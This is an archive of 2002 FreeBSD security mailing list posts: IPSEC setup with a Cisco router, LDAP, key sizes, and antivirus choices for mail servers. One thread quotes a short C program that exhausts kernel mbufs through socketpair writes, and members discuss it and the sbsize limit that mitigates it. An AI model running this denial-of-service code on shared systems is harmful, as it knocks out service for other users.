From owner-freebsd-security Sun Sep 1 3:21:37 2002
Date: Sun, 1 Sep 2002 12:21:25 +0200
From: lupe@lupe-christoph.de (Lupe Christoph)
To: Mark R V Murray
Cc: freebsd-security@freebsd.org
Subject: Re: Administrativia: New list charter

On Saturday, 2002-08-31 at 10:04:59 +0100, Mark R V Murray wrote:

> FREEBSD-SECURITY Security issues
> This is a technical discussion list covering FreeBSD security issues.
> The intention is for the list to contain a high-signal, low-noise
> discussion of issues affecting the security of FreeBSD.

Fine. Clear enough in my book.

Can we now start freebsd-security-questions or -questions-security?
Otherwise, we will just have the same number of OT questions.
Perhaps more moral right to send them to -questions, but nobody will
help them anymore. (Or more people will go OT.)

Thanks,
Lupe Christoph
--
| lupe@lupe-christoph.de | http://www.lupe-christoph.de/ |
| Big Misunderstandings #6398: The Titanic was not supposed to be |
| unsinkable. The designer had a speech impediment. He said: "I have |
| thith great unthinkable conthept ..." |

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Mon Sep 2 2: 5:16 2002
Date: Mon, 2 Sep 2002 11:04:09 +0200
From: Frank Bonnet
To: freebsd-security@freebsd.org
Subject: LDAP authentication ?

Hi

Is it possible to use LDAP as an authentication system
with FreeBSD 4.6.2 to replace NIS that I use for now ?

If yes what do I need to install for ?

Thanks for any infos
--
Frank

From owner-freebsd-security Mon Sep 2 6:43:27 2002
Date: Mon, 2 Sep 2002 14:42:01 +0100
From: Bruce M Simpson
To: Frank Bonnet
Cc: freebsd-security@freebsd.org
Subject: Re: LDAP authentication ?

On Mon, Sep 02, 2002 at 11:04:09AM +0200, Frank Bonnet wrote:
> Is it possible to use LDAP as an authentication system
> with FreeBSD 4.6.2 to replace NIS that I use for now ?
>
> If yes what do I need to install for ?

Google for ypldapd. This was also covered in previous discussion on this
list so please search the archives at www.freebsd.org for this term.
There are reasons why LDAP can't be used directly.

BMS

From owner-freebsd-security Mon Sep 2 14:15:50 2002
Date: Mon, 2 Sep 2002 22:15:35 +0100 (BST)
From: Ivan Streetovich
To: Benjamin Krueger, chat@freebsd.org, security@freebsd.org
Subject: Re: From: Ivan Streetovich, Japan

--- Benjamin Krueger wrote:
> * Ivan Streetovich (bad_dot_c@yahoo.com) [020901 23:15]:
> > Date: Mon, 2 Sep 2002 07:05:52 +0100 (BST)
> > From: Ivan Streetovich
> > Subject: From: Ivan Streetovich, Japan
> > To: security@freebsd.com
> >
> > #define BUFFERSIZE 204800
> > extern int
> >
> > /* Released by Ivan Streetovich, Japan *
> >  * Causes problems on FreeBSD */
> >
> > main(void)
> > {
> >         int p[2], i;
> >         char crap[BUFFERSIZE];
> >         while (1)
> >         {
> >                 if (socketpair(AF_UNIX, SOCK_STREAM, 0, p) == -1)
> >                         break;
> >                 i = BUFFERSIZE;
> >                 setsockopt(p[0], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
> >                 setsockopt(p[0], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
> >                 setsockopt(p[1], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
> >                 setsockopt(p[1], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
> >                 fcntl(p[0], F_SETFL, O_NONBLOCK);
> >                 fcntl(p[1], F_SETFL, O_NONBLOCK);
> >                 write(p[0], crap, BUFFERSIZE);
> >                 write(p[1], crap, BUFFERSIZE);
> >         }
> >         exit(0);
> > }
>
> This problem (and this exact source code, funnily enough. Are you sure you
> released it?) has already been reported to the security-officer and is
> (afaik) being addressed by the developers. =)
>
> --
> Benjamin Krueger
>
> "Everyone has wings, some folks just don't know what they're for"
> - B. Banzai
> ----------------------------------------------------------------
> Send mail w/ subject 'send public key' or query for (0x251A4B18)
> Fingerprint = A642 F299 C1C1 C828 F186 A851 CFF0 7711 251A 4B18

i got first, was sent SO from x-friend

From owner-freebsd-security Mon Sep 2 14:33:16 2002
Date: Mon, 2 Sep 2002 14:31:28 -0700
From: Benjamin Krueger
To: Ivan Streetovich
Cc: Benjamin Krueger, chat@freebsd.org, security@freebsd.org
Subject: Re: From: Ivan Streetovich, Japan

* Ivan Streetovich (bad_dot_c@yahoo.com) [020902 14:14]:
> --- Benjamin Krueger wrote:
> > * Ivan Streetovich (bad_dot_c@yahoo.com) [020901 23:15]:
> >
> > This problem (and this exact source code, funnily enough. Are you sure you
> > released it?)
> > has already been reported to the security-officer and is
> > (afaik) being addressed by the developers. =)
> >
> > --
> > Benjamin Krueger
>
> i got first, was sent SO from x-friend

Interesting. I received a copy on Thursday night PST and forwarded it to phk
and the security officer in the wee morning hours of Friday...

I've heard rumour that it was culled from an (years) old post on a freebsd
list.

--
Benjamin Krueger

"Everyone has wings, some folks just don't know what they're for"
- B. Banzai
----------------------------------------------------------------
Send mail w/ subject 'send public key' or query for (0x251A4B18)
Fingerprint = A642 F299 C1C1 C828 F186 A851 CFF0 7711 251A 4B18

From owner-freebsd-security Mon Sep 2 17: 6:28 2002
Date: Mon, 2 Sep 2002 19:09:40 -0500 (CDT)
From: Mike Silbersack
To: Benjamin Krueger
Cc: Ivan Streetovich
Subject: Re: From: Ivan Streetovich, Japan

On Mon, 2 Sep 2002, Benjamin Krueger wrote:

> Interesting. I received a copy on Thursday night PST and forwarded it to phk
> and the security officer in the wee morning hours of Friday...
>
> I've heard rumour that it was culled from an (years) old post on a freebsd
> list.
>
> --
> Benjamin Krueger

This is just another local mbuf exhaustion attack. We should probably put
in countermeasures for this one of these days, but it's not all that much
of a serious problem. If you have a shell machine you wish to get your
access revoked on, then by all means go ahead and use this program.

Mike "Silby" Silbersack

From owner-freebsd-security Tue Sep 3 6:31:10 2002
Date: Tue, 3 Sep 2002 14:33:18 +0000
From: Anthony Schneider
To: Mike Silbersack
Cc: Benjamin Krueger, Ivan Streetovich, chat@FreeBSD.ORG, security@FreeBSD.ORG
Subject: Re: From: Ivan Streetovich, Japan

limiting sbsize does the trick.

-Anthony.

On Mon, Sep 02, 2002 at 07:09:40PM -0500, Mike Silbersack wrote:
>
> On Mon, 2 Sep 2002, Benjamin Krueger wrote:
>
> > Interesting. I received a copy on Thursday night PST and forwarded it to phk
> > and the security officer in the wee morning hours of Friday...
> >
> > I've heard rumour that it was culled from an (years) old post on a freebsd
> > list.
> >
> > --
> > Benjamin Krueger
>
> This is just another local mbuf exhaustion attack. We should probably put
> in countermeasures for this one of these days, but it's not all that much
> of a serious problem. If you have a shell machine you wish to get your
> access revoked on, then by all means go ahead and use this program.
>
> Mike "Silby" Silbersack

From owner-freebsd-security Tue Sep 3 7:50: 0 2002
Date: Tue, 03 Sep 2002 10:50:02 -0400
From: Mike Tancsa
To: security@freebsd.org
Subject: FreeBSD IPSEC connection to a Cisco Router using ESP (FAQ submission)

Question: How do
I setup an IPSEC ESP Tunnel between a Cisco router and FreeBSD

AN Answer:

OK, I have seen a few people ask this question, but I had not found via the
search engines a sample config on how to setup an IPSEC tunnel between a
FreeBSD box and Cisco router. We had a customer over the weekend wanting to
do just this, so I figured I would post the setup here in case anyone else
wanted to do something like this.

Given the following setup

FreeBSD--------------------------------Cisco
192.168.100.9/24 and 1.1.1.1/30        2.2.2.2/30 and 96.0.0.1/24

i.e. 2 machines connected to the Internet, at distant locations-- FreeBSD
box has 1.1.1.1/30 as the public address (i.e. NON RFC 1918) and the
Cisco, 2.2.2.2/30. The goal is to setup a VPN tunnel between the two using
an IPSEC connection with AH and ESP. For the setup, I used an old Cisco
4700 with only DES encryption. Note, it is recommended that you use
something stronger like 3des in a production environment.

On the Cisco we have the following config.

4700-router#show run
Building configuration...

Current configuration : 1991 bytes
!
version 12.2
service timestamps debug uptime
service timestamps log uptime
no service password-encryption
!
hostname 4700-router
!
boot system flash c4500-jk8s-mz.122-10b.bin
aaa new-model
!
ip subnet-zero
!
!
!
crypto isakmp policy 1
 hash md5
 authentication pre-share
 group 2
 lifetime 6000
crypto isakmp key donttell address 1.1.1.1
crypto isakmp key donttell address 2.2.2.2
!
crypto ipsec security-association lifetime seconds 6000
!
crypto ipsec transform-set MB esp-des esp-md5-hmac
!
crypto map FreeBSDIPSEC-MAP 1 ipsec-isakmp
 description My customer site called MB
 set peer 1.1.1.1
 set transform-set MB
 set pfs group2
 match address 109
!
!
!
!
interface Ethernet0
 ip address 96.0.0.1 255.255.255.0
 media-type 10BaseT
!
interface FastEthernet0
 ip address 2.2.2.2 255.255.255.252
 half-duplex
 crypto map FreeBSDIPSEC-MAP
!
ip classless
ip route 0.0.0.0 0.0.0.0 2.2.2.1
no ip http server
!
access-list 109 permit ip 192.168.100.0 0.0.0.255 96.0.0.0 0.0.0.255
access-list 109 permit ip 96.0.0.0 0.0.0.255 192.168.100.0 0.0.0.255
!
!
line con 0
line aux 0
line vty 0 4
 exec-timeout 0 0
!
end

4700-router#

On the FreeBSD side, we have the following script, 00_ipsec.sh you can put
in /usr/local/etc/rc.d

#!/bin/sh
case "$1" in
start)
        setkey -F
        setkey -FP
        setkey -c <&2
        ;;
esac
exit 0

remote anonymous
{
        exchange_mode main,base,aggressive;
        doi ipsec_doi;
        #situation identity_only;
        my_identifier address 1.1.1.1;
        nonce_size 16;
        lifetime time 6000 sec; # sec,min,hour
        initial_contact on;
        support_mip6 on;
        proposal_check obey; # obey, strict or claim

        proposal {
                encryption_algorithm des;
                hash_algorithm md5;
                authentication_method pre_shared_key ;
                dh_group 2 ;
        }
}

sainfo anonymous
{
        pfs_group 2;
        lifetime time 6000 sec;
        encryption_algorithm des,3des ;
        authentication_algorithm hmac_md5;
        compression_algorithm deflate;
}

And don't forget to add

2.2.2.2 donttell

to /usr/local/etc/racoon/psk.txt

In terms of interfaces, we just have the 2... No gif. To bring up the
tunnel, make sure you do a ping specifying the source address e.g.

ping -S 192.168.100.9 96.0.0.1

or just generate something from behind the FreeBSD box.

---Mike
--------------------------------------------------------------------
Mike Tancsa, tel +1 519 651 3400
Sentex Communications, mike@sentex.net
Providing Internet since 1994 www.sentex.net
Cambridge, Ontario Canada www.sentex.net/mike

From owner-freebsd-security Tue Sep 3 9:49:11 2002
Date: Tue, 3 Sep 2002 11:52:24 -0500 (CDT)
From: Mike Silbersack
To: Alfred Perlstein
Cc: Benjamin Krueger, Ivan Streetovich
Subject: Re: From: Ivan Streetovich, Japan

On Mon, 2 Sep 2002, Alfred Perlstein wrote:

> * Mike Silbersack [020902 17:06] wrote:
> >
> > This is just another local mbuf exhaustion attack.
> > We should probably put
> > in countermeasures for this one of these days, but it's not all that much
> > of a serious problem. If you have a shell machine you wish to get your
> > access revoked on, then by all means go ahead and use this program.
>
> I think the 'sbsize' ulimit already protects people from this.
>
> I think the problem is that it's not set by default, however I think
> that's somewhat of a good thing as it makes sure we don't bomb out
> when someone tries to bench us.

Doh, I had forgotten about that setting. Sbsize does work decently in
such a situation, but it's not ready to be enabled by default. In
addition to the fact that it would bomb out people doing high volume
benchmarks, there's also the problem that it accounts for receive buffers,
which are empty most of the time. Bosko and I had thrown around some
ideas on how to improve mbuf limiting, but we haven't had time to work on
them yet.

Mike "Silby" Silbersack

From owner-freebsd-security Tue Sep 3 14:52:55 2002
Date: Tue, 3 Sep 2002 14:50:23 -0700 (PDT)
From: Mike Hoskins
To: "Perry E.
Metzger"
Cc: Michael W Mitton
Subject: Re: 1024 bit key considered insecure (sshd)

On 30 Aug 2002, Perry E. Metzger wrote:

> Michael W Mitton writes:
> > My data may not be worth a billion dollars, but I can be fairly certain
> > that I am part of a group ( a rather _large_ group ) whose combined
> > information is worth that.

If you're not paranoid enough to have already upgraded to larger keys (and
dealt with the specific challenges that may present for your
organization), then you likely do not need larger keys.

As for the organizations that can afford to spend billions of dollars to
crack our keys (although they'd likely spend much less, since they'd
fabricate their own systems), the present paranoia warranting disdain over
1024 bit keys must also point to the possibility that they've been able to
crack our keys long before now.

Weigh the value of your organization's core assets, and take appropriate
action. Nothing has really changed simply because an email was sent to
Bugtraq. The same risks present today were in some way present last year,
or as far back as your paranoia dictates.

I'm not sure who cross-posted to so many lists. My apologies if this
isn't appropriate to any included targets. I intend this message for
freebsd-security, but do not like to delete/alter To/CC lists in threads I
did not start.

Later,
-Mike

From owner-freebsd-security Tue Sep 3 21:51:44 2002
Date: Wed, 4 Sep 2002 01:51:34 -0300 (ADT)
From: "Marc G. Fournier"
To: freebsd-security@freebsd.org
Subject: Anti virus software for FreeBSD ...

Seems quite limited ... I'm looking for one to run with amavisd on a mail
server, but the only one I can seem to find is vscan, and for that, i
can't find any licensing information past that '30 day' period :(

I've looked at the openantivirus.org site ... but nothing there is jumping
out at me, and their virus definitions look a bit old?

anyone?

From owner-freebsd-security Tue Sep 3 22:38:37 2002
Date: Wed, 04 Sep 2002 01:38:22 -0400
From: John Holstein
To: "Marc G. Fournier"
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Anti virus software for FreeBSD ...

At 01:51 AM 9/4/2002 -0300, you wrote:

>Seems quite limited ... I'm looking for one to run with amavisd on a mail
>server, but the only one I can seem to find is vscan, and for that, i
>can't find any licensing information past that '30 day' period :(
>
>I've looked at the openantivirus.org site ... but nothing there is jumping
>out at me, and their virus definitions look a bit old?
>
>anyone?

Kaspersky:

Sendmail:
http://www.kaspersky.com/buyonline.html?chapter=752114&spage=3

File Server:
http://www.kaspersky.com/buyonline.html?chapter=752025&spage=3

F-Prot

Dunno if it supports Sendmail yet.
http://www.f-prot.com/products/fpfreebsd.html

RAV
http://www.ravantivirus.com/

That's a few to start, dunno if some of the others are still available.

John Holstein

From owner-freebsd-security Tue Sep 3 23: 2:58 2002
Subject: Re: Anti virus software for FreeBSD ...
From: Jan Lentfer
To: John Holstein
Cc: "Marc G.
Fournier", FreeBSD Security Maillinglist
Date: 04 Sep 2002 08:02:32 +0200

On Wed, 2002-09-04 at 07.38, John Holstein wrote:
> At 01:51 AM 9/4/2002 -0300, you wrote:
>
> >Seems quite limited ... I'm looking for one to run with amavisd on a mail
> >server, but the only one I can seem to find is vscan, and for that, i
> >can't find any licensing information past that '30 day' period :(
> >
> >I've looked at the openantivirus.org site ... but nothing there is jumping
> >out at me, and their virus definitions look a bit old?
> >
> >anyone?
>
> Kaspersky:
>
> Sendmail:
> http://www.kaspersky.com/buyonline.html?chapter=752114&spage=3
>
> File Server:
> http://www.kaspersky.com/buyonline.html?chapter=752025&spage=3
>
> F-Prot
>
> Dunno if it supports Sendmail yet.
> http://www.f-prot.com/products/fpfreebsd.html
>
> RAV
> http://www.ravantivirus.com/
>
> That's a few to start, dunno if some of the others are still available.

There's also Sophos Sweep. They even have an OSF/1 version that works with
FreeBSD/Alpha.

Jan

--
Jan Lentfer
System Administrator
Molecular Cell Biology / AG Holstein, Darmstadt University of Technology,
Schnittspahnstr.
10, 64287 Darmstadt, Germany
Tel: +49 6151 16 5563 / Tel private: +49 6151 788415 / mobile: +49 163 4712037

From owner-freebsd-security Wed Sep 4 5:28:23 2002
Date: Wed, 04 Sep 2002 08:28:15 -0400
To: "Marc G. Fournier"
From: Mike Tancsa
Subject: Re: Anti virus software for FreeBSD ...
Cc: freebsd-security@FreeBSD.ORG

You f-prot under linux emulation works very well with LINUX and has a per
server license vs per seat like the others.

         ---Mike

At 01:51 AM 9/4/2002 -0300, Marc G. Fournier wrote:

>Seems quite limited ... I'm looking for one to run with amavisd on a mail
>server, but the only one I can seem to find is vscan, and for that, i
>can't find any licensing information past that '30 day' period :(
>
>I've looked at the openantivirus.org site ...
but nothing there is jumping
>out at me, and their virus definitions look a bit old?
>
>anyone?

--------------------------------------------------------------------
Mike Tancsa,                          tel +1 519 651 3400
Sentex Communications,                mike@sentex.net
Providing Internet since 1994         www.sentex.net
Cambridge, Ontario Canada             www.sentex.net/mike

From owner-freebsd-security Wed Sep 4 5:34:53 2002
Date: Wed, 4 Sep 2002 14:34:32 +0200 (MET DST)
From: Peter Strazovec
To: Mike Tancsa
Cc: "Marc G. Fournier"
Subject: Re: Anti virus software for FreeBSD ...

Try NOD32 (www.nod32.com)
works fine with amavis, has freebsd binary and good (excellent) rating in
virus bulletin

Pete

On Wed, 4 Sep 2002, Mike Tancsa wrote:

>
> You f-prot under linux emulation works very well with LINUX and has a per
> server license vs per seat like the others.
>
>          ---Mike
>
> At 01:51 AM 9/4/2002 -0300, Marc G. Fournier wrote:
>
> >Seems quite limited ... I'm looking for one to run with amavisd on a mail
> >server, but the only one I can seem to find is vscan, and for that, i
> >can't find any licensing information past that '30 day' period :(
> >
> >I've looked at the openantivirus.org site ... but nothing there is jumping
> >out at me, and their virus definitions look a bit old?
> >
> >anyone?
>
> --------------------------------------------------------------------
> Mike Tancsa,                          tel +1 519 651 3400
> Sentex Communications,                mike@sentex.net
> Providing Internet since 1994         www.sentex.net
> Cambridge, Ontario Canada             www.sentex.net/mike

From owner-freebsd-security Wed Sep 4 5:40:55 2002
Date: Wed, 04 Sep 2002 07:40:34 -0500
From: Len Conrad
Subject: Re: Anti virus software for FreeBSD ...

>You f-prot under linux emulation works very well with LINUX and has a per
>server license vs per seat like the others.

Mike, are you referring to:

http://www.f-secure.com/products/anti-virus/firewalls/linux.shtml

or

http://www.f-secure.com/products/anti-virus/file-servers/

Len

____________________________________________________________________
www.menandmice.com/DNS-training : DNS Training
BIND8NT.MEIway.com: Secure config ; DNS and mail interactions
IMGate.MEIway.com : Free, proven config for anti-mail-abuse gateways

From owner-freebsd-security Wed Sep 4 6: 4:19 2002
Date: Wed, 04 Sep 2002 07:59:13 -0500
From: Eric Anderson
To: Jan Lentfer
Cc: John Holstein, "Marc G. Fournier", FreeBSD Security Maillinglist
Subject: Re: Anti virus software for FreeBSD ...

Jan Lentfer wrote:
> On Wed, 2002-09-04 at 07:38, John Holstein wrote:
>
>>At 01:51 AM 9/4/2002 -0300, you wrote:
>>
>>
>>>Seems quite limited ... I'm looking for one to run with amavisd on a mail
>>>server, but the only one I can seem to find is vscan, and for that, i
>>>can't find any licensing information past that '30 day' period :(
>>>
>>>I've looked at the openantivirus.org site ... but nothing there is jumping
>>>out at me, and their virus definitions look a bit old?
>>>
>>>anyone?

[snip]

> There's also Sophos Sweep. They even have an OSF/1 version that works
> with FreeBSD/Alpha.
>
> Jan

I also use Sophos' Sweep to scan our fileservers/email. It's fast,
slick, and easy to get working with amavis.

This should probably be -questions or -chat. ??

Eric

--
------------------------------------------------------------------
Eric Anderson      Systems Administrator      Centaur Technology
The moon may be smaller than Earth, but it's further away.
------------------------------------------------------------------

From owner-freebsd-security Wed Sep 4 6: 4:53 2002
Date: Wed, 4 Sep 2002 16:04:34 +0300
From: Ismail YENIGUL
To: Mike Tancsa
Cc: scrappy@hub.org, freebsd-security@FreeBSD.ORG
Subject: Re: Anti virus software for FreeBSD ...

hi

you can use rav antivirus for mail server!,
http://www.ravantivirus.com

regards

On Wed, 04 Sep 2002 08:28:15 -0400
Mike Tancsa wrote:

>
> You f-prot under linux emulation works very well with LINUX and has a per
> server license vs per seat like the others.
>
>          ---Mike
>
> At 01:51 AM 9/4/2002 -0300, Marc G. Fournier wrote:
>
> >Seems quite limited ...
I'm looking for one to run with amavisd on a mail
> >server, but the only one I can seem to find is vscan, and for that, i
> >can't find any licensing information past that '30 day' period :(
> >
> >I've looked at the openantivirus.org site ... but nothing there is jumping
> >out at me, and their virus definitions look a bit old?
> >
> >anyone?
>
> --------------------------------------------------------------------
> Mike Tancsa,                          tel +1 519 651 3400
> Sentex Communications,                mike@sentex.net
> Providing Internet since 1994         www.sentex.net
> Cambridge, Ontario Canada             www.sentex.net/mike

O2Net - Next-Generation Communication Solutions http://www.o2.net.tr

--
The world is coming to an end. Please log off. - the root of the universe
Ismail YENIGUL
ismail@o2.net.tr
ismail@EnderUNIX.ORG

From owner-freebsd-security Wed Sep 4 6: 8:41 2002
From: Roman Zabolotnikov
To: freebsd-security@FreeBSD.ORG
Subject: RE: Anti virus software for FreeBSD ...
Date: Wed, 4 Sep 2002 20:08:28 +0700

Also you can use DrWeb.
You can find it in your ports collection

/usr/ports/security/drweb
/usr/ports/security/drweb-sendmail
/usr/ports/security/drwebd

> -----Original Message-----
> From: Marc G. Fournier [mailto:scrappy@hub.org]
> Sent: Wednesday, September 04, 2002 11:52 AM
> To: freebsd-security@FreeBSD.ORG
> Subject: Anti virus software for FreeBSD ...
>
>
>
> Seems quite limited ... I'm looking for one to run with
> amavisd on a mail server, but the only one I can seem to find
> is vscan, and for that, i can't find any licensing
> information past that '30 day' period :(
>
> I've looked at the openantivirus.org site ... but nothing
> there is jumping out at me, and their virus definitions look
> a bit old?
>
> anyone?

From owner-freebsd-security Wed Sep 4 6:17:48 2002
Date: Wed, 04 Sep 2002 09:17:10 -0400
To: Len Conrad
From: Mike Tancsa
Subject: Re: Anti virus software for FreeBSD ...

Actually, I was thinking of

http://www.f-prot.com/f-prot/products/fplin.html

We use the small business version in conjunction with the milter version
amavis and it works very well. Updates are frequent and it has not crashed
or anything. BUT, someone just pointed out, they now have a native FreeBSD
version now!

One thing I would recommend if you are scanning customer email (no matter
which product you implement), don't rely on just one mail server. There are
a number of ways to DoS these things deliberately and by accident... or at
least REALLY slow them down. Using the milter version with sendmail it's
quite easy to build redundant servers that will mitigate this at least.

         ---Mike

At 07:40 AM 04/09/2002 -0500, Len Conrad wrote:

>Mike, are you referring to:
>
>http://www.f-secure.com/products/anti-virus/firewalls/linux.shtml
>
>or
>
>http://www.f-secure.com/products/anti-virus/file-servers/
>
>Len
>
>
>____________________________________________________________________
>www.menandmice.com/DNS-training : DNS Training
>BIND8NT.MEIway.com: Secure config ; DNS and mail interactions
>IMGate.MEIway.com : Free, proven config for anti-mail-abuse gateways

From owner-freebsd-security Wed Sep 4 6:26:32 2002
Date: Wed, 04 Sep 2002 16:26:31 +0300
From: Ivajlo Nikolov
To: freebsd-security@freebsd.org
Subject: Re: Anti virus software for FreeBSD ...

I need anti virus software too.
Can you something I can use with qmail, with
free license?

i.

"Marc G. Fournier" wrote:

> Seems quite limited ... I'm looking for one to run with amavisd on a mail
> server, but the only one I can seem to find is vscan, and for that, i
> can't find any licensing information past that '30 day' period :(
>
> I've looked at the openantivirus.org site ... but nothing there is jumping
> out at me, and their virus definitions look a bit old?
>
> anyone?

From owner-freebsd-security Wed Sep 4 6:31:25 2002
Subject: Re: Anti virus software for FreeBSD ...
From: Matt Critcher
To: freebsd-security@freebsd.org
Date: 04 Sep 2002 08:30:34 -0500

On Tue, 2002-09-03 at 23:51, Marc G. Fournier wrote:
>
> Seems quite limited ...
I'm looking for one to run with amavisd on a mail
> server, but the only one I can seem to find is vscan, and for that, i
> can't find any licensing information past that '30 day' period :(
>
> I've looked at the openantivirus.org site ... but nothing there is jumping
> out at me, and their virus definitions look a bit old?
>
> anyone?
>

we've used (and are still using) a product from http://www.hbedv.com/
it's free for non-commercial use, and works pretty good. you might
consider it....

hope this helps.

matt

From owner-freebsd-security Wed Sep 4 6:38:35 2002
Date: Wed, 4 Sep 2002 15:39:57 +0200
From: Radoslaw Wierzbicki
Organization: przemysl.net.pl
To: freebsd-security@freebsd.org
Subject: Re[2]: Anti virus software for FreeBSD ...

Hello!

You wrote (04.09.2002,15:26:31):

IN> I need anti virus software too. Can you something I can use with qmail, with
IN> free license?

Look at http://linux.mks.com.pl or http://download.mks.com.pl/files/.

--
Radoslaw Wierzbicki - administrator
mailto:radek@przemysl.net.pl && http://przemysl.net.pl

From owner-freebsd-security Wed Sep 4 7:15:36 2002
Date: Wed, 4 Sep 2002 16:15:27 +0200
From: Thomas Quinot
To: "Marc G. Fournier"
Cc: freebsd-security@freebsd.org
Subject: Re: Anti virus software for FreeBSD ...

On 2002-09-04, Marc G. Fournier wrote:

> I've looked at the openantivirus.org site ... but nothing there is jumping
> out at me, and their virus definitions look a bit old?

You can take a look at Clamav (GPL): http://clamav.elektrapro.com/

--
Thomas.Quinot@Cuivre.FR.EU.ORG

From owner-freebsd-security Wed Sep 4 7:22:21 2002
From: "Derek"
To: "Marc G. Fournier"
Subject: Re: Anti virus software for FreeBSD ...
Date: Wed, 4 Sep 2002 10:24:10 -0400

> i can't find any licensing information past that
> '30 day' period :(

Hello Marc,
Send an email to Daniel. He worked with
me over the phone to determine which product numbers to order.
Let him know what you intend to do with it. My gut feeling is
that he is a Canadian rep (our company being Canadian), but
perhaps he can direct you.
These are the numbers that we came up
with:

NSEABE-AA-A     Scanner
NSEYBM-AA-A     One year free updates

Derek

From owner-freebsd-security Wed Sep 4 9:49:12 2002
To: freebsd-security@FreeBSD.ORG
Subject: Re: Anti virus software for FreeBSD ...
Date: Wed, 04 Sep 2002 09:49:05 -0700
From: Eli Dart

This question comes up in this forum every couple of months....

Is anyone interested in writing a FAQ entry about this? It looks
like there are several people in this discussion with the experience
to do it....

        --eli

In reply to "Derek":

> > i can't find any licensing information past that
> > '30 day' period :(
>
> Hello Marc,
> Send an email to Daniel. He worked with
> me over the phone to determine which product numbers to order.
> Let him know what you intend to do with it. My gut feeling is
> that he is a Canadian rep (our company being Canadian), but
> perhaps he can direct you. These are the numbers that we came up
> with:
>
> NSEABE-AA-A     Scanner
> NSEYBM-AA-A     One year free updates
>
> Derek

From owner-freebsd-security Wed Sep 4 9:59: 7 2002
Date: Wed, 4 Sep 2002 18:58:54 +0200
From: Aragon Gouveia
To: "Marc G. Fournier"
Cc: freebsd-security@freebsd.org
Subject: Re: Anti virus software for FreeBSD ...
Fournier" , freebsd-security@freebsd.org References: <20020904014942.F25799-100000@hub.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20020904014942.F25799-100000@hub.org> User-Agent: Mutt/1.4i X-Operating-System: FreeBSD 4.6-RC i386 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org There's also McAfee - /usr/ports/security/vscan Regards, Aragon | By Marc G. Fournier | [ 2002-09-04 06:54 +0200 ] > > Seems quite limited ... I'm looking for one to run with amavisd on a mail > server, but the only one I can seem to find is vscan, and for that, i > can't find any licensing information past that '30 day' period :( > > I've looked at the openantivirus.org site ... but nothing there is jumping > out at me, and their virus definitions look a bit old? > > anyone? > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 4 10:12: 2 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 7997837B400 for ; Wed, 4 Sep 2002 10:11:57 -0700 (PDT) Received: from smtp.comcast.net (smtp.comcast.net [24.153.64.2]) by mx1.FreeBSD.org (Postfix) with ESMTP id 24FA143E3B for ; Wed, 4 Sep 2002 10:11:57 -0700 (PDT) (envelope-from lomifeh@earthlink.net) Received: from [68.39.202.147] (bgp586692bgs.jdover01.nj.comcast.net [68.39.202.147]) by mtaout03.icomcast.net (iPlanet Messaging Server 5.1 HotFix 0.8 (built May 13 2002)) with ESMTP id <0H1X00H0QBRWV2@mtaout03.icomcast.net> for freebsd-security@freebsd.org; Wed, 04 Sep 2002 13:11:56 -0400 (EDT) Date: Wed, 04 Sep 2002 13:11:55 -0400 From: 
Lawrence Sica Subject: Re: Anti virus software for FreeBSD ... In-reply-to: <20020904014942.F25799-100000@hub.org> To: "Marc G. Fournier" , freebsd-security Message-id: MIME-version: 1.0 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT User-Agent: Microsoft-Entourage/10.1.0.2006 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On 09/04/02 12:51 AM, "Marc G. Fournier" wrote: > > Seems quite limited ... I'm looking for one to run with amavisd on a mail > server, but the only one I can seem to find is vscan, and for that, i > can't find any licensing information past that '30 day' period :( > I'd be careful with amavis, I've always had scaling issues with it. I haven't found anything server-wise I really like for that. You need to talk to McAfee about vscan licensing. I used vscan at one place and it worked well, caught every virus that was thrown at it. And its dat updates allowed for a simple crontab on it. 
--Larry To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 4 10:13:40 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id E0F5D37B400 for ; Wed, 4 Sep 2002 10:13:33 -0700 (PDT) Received: from smtp.comcast.net (smtp.comcast.net [24.153.64.2]) by mx1.FreeBSD.org (Postfix) with ESMTP id 8F6BF43E3B for ; Wed, 4 Sep 2002 10:13:33 -0700 (PDT) (envelope-from lomifeh@earthlink.net) Received: from [68.39.202.147] (bgp586692bgs.jdover01.nj.comcast.net [68.39.202.147]) by mtaout02.icomcast.net (iPlanet Messaging Server 5.1 HotFix 0.8 (built May 13 2002)) with ESMTP id <0H1X002TEBUKIO@mtaout02.icomcast.net> for freebsd-security@freebsd.org; Wed, 04 Sep 2002 13:13:32 -0400 (EDT) Date: Wed, 04 Sep 2002 13:13:31 -0400 From: Lawrence Sica Subject: Re: Anti virus software for FreeBSD ... In-reply-to: <20020904164905.D786A3B1AE@gemini.nersc.gov> To: Eli Dart , freebsd-security Message-id: MIME-version: 1.0 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT User-Agent: Microsoft-Entourage/10.1.0.2006 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On 09/04/02 12:49 